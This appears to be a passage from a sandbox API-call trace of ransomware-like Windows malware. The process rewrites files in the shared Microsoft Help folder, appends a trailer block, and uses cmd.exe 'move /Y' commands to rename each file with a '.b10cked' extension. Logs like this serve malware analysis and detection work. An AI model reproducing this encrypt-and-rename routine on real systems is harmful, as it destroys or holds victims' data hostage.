lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25236844622) returned 1 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x30e2 [0195.581] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0195.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0195.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x35ca [0195.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x35ca [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.583] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ae4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ae4, lpOverlapped=0x0) returned 1 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.583] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ae4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ae4, lpOverlapped=0x0) returned 1 [0195.584] SetFilePointer (in: hFile=0x120, lDistanceToMove=-6884, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ae6 [0195.584] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ae4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ae4, lpOverlapped=0x0) returned 1 [0195.584] SetFilePointer (in: hFile=0x120, lDistanceToMove=-6884, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ae6 [0195.584] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ae4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ae4, lpOverlapped=0x0) returned 1 [0195.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MKWD_NamedURL.HxW", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0195.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MKWD_NamedURL.HxW", cchWideChar=25, lpMultiByteStr=0x132f75c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx_1033_MKWD_NamedURL.HxW", lpUsedDefaultChar=0x0) returned 25 [0195.590] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x35ca [0195.590] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0195.590] CloseHandle (hObject=0x120) returned 1 [0195.591] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MKWD_NamedURL.HxW", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW") returned 0x27 [0195.591] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0195.592] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x53c, dwThreadId=0xc20)) returned 1 [0195.620] CloseHandle (hObject=0x1b4) returned 1 [0195.620] CloseHandle (hObject=0x120) returned 1 [0195.620] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.620] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.620] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0195.620] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.620] ReleaseMutex (hMutex=0xf8) returned 1 [0195.620] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.620] ReleaseMutex (hMutex=0xf8) returned 1 [0195.620] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.620] ReleaseMutex (hMutex=0xf8) returned 1 [0195.620] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.620] ReleaseMutex (hMutex=0xf8) returned 1 [0195.620] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MTOC_Hx.HxH" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mtoc_hx.hxh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25241006838) returned 1 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x227e [0195.622] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0195.623] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0195.623] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.623] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2766 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2766 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.624] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x13b2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x13b2, lpOverlapped=0x0) returned 1 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.624] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x13b2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x13b2, lpOverlapped=0x0) returned 1 [0195.945] SetFilePointer (in: hFile=0x120, lDistanceToMove=-5042, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x13b4 [0195.945] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x13b2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x13b2, lpOverlapped=0x0) returned 1 [0195.945] SetFilePointer (in: hFile=0x120, lDistanceToMove=-5042, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x13b4 [0195.945] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x13b2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x13b2, lpOverlapped=0x0) returned 1 [0195.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MTOC_Hx.HxH", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0195.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MTOC_Hx.HxH", cchWideChar=19, lpMultiByteStr=0x1328794, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx_1033_MTOC_Hx.HxH", lpUsedDefaultChar=0x0) returned 19 [0195.949] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2766 [0195.949] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0195.949] CloseHandle (hObject=0x120) returned 1 [0195.950] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MTOC_Hx.HxH", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH") returned 0x27 [0195.950] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0195.951] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa70, dwThreadId=0xbd8)) returned 1 [0195.955] CloseHandle (hObject=0x1b4) returned 1 [0195.955] CloseHandle (hObject=0x120) returned 1 [0195.955] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.955] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.955] CompareStringW (Locale=0x400, 